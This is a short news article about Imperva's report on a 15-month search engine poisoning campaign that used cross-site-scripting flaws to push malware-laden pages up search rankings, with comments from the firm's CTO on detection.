Search engine poisoning methodologies revealed

The paper - Imperva's second HII (hacker intelligence initiative) report - is the result of an analysis into a 15 month SEP campaign which the firm describes as highly successful and without any apparent counter-measures being deployed by search engines.

This, says the firm, illustrates how websites - often unknown to their administrator - and web search engines become the conduit for these types of attack, and demonstrates that more needs to be done to stop these types of malware attacks.

According to the report, SEP attacks manipulate search engines to display search results that contain references to malware-delivering websites.

"There are a multitude of methods to perform SEP, including taking control of popular websites, using the search engines' sponsored links to reference malicious sites and injecting HTML code", says the analysis

One of the most popular SEP methodologies involves sites which are vulnerable to cross site scripting (XSS) attacks, which are carried out by advanced scripted Google searches.

Then, by attacking the site in question and infecting its pages with malware - or, more routinely, installing routes to other infected pages on the site - the hackers effectively create a set of web pages which can be manipulated to be high up in search engine rankings with attractive information - that are a trap for internet users.

By attacking those sites that are recommended by search engines for given topics, Imperva claims that these infected sites are effectively missed by web browser add-ins that look for malicious pages.

According to Amichai Shulman, Imperva's CTO, his research team were able to detect and track a SEP attack campaign from start to end.

"The prevalence and longevity of this attack indicates not only how long it lasted undetected, but also that companies are not aware they are being used as a conduit of an attack", he said.

"It also highlights that search engines should do more to improve their ability to accurately identify potentially harmful sites and warn users about them", he added.

Shulman is also advising search engine providers that current solutions that warn users of malicious sites lack the required accuracy and precision ,whereas many malicious sites continue to be returned un-flagged by relevant security software.

"However, these solutions can be enhanced by studying the footprints of a SEP via XSS. This allows a more accurate, and timely notification, as well as prudent indexing", he explained.

What’s hot on Infosecurity Magazine?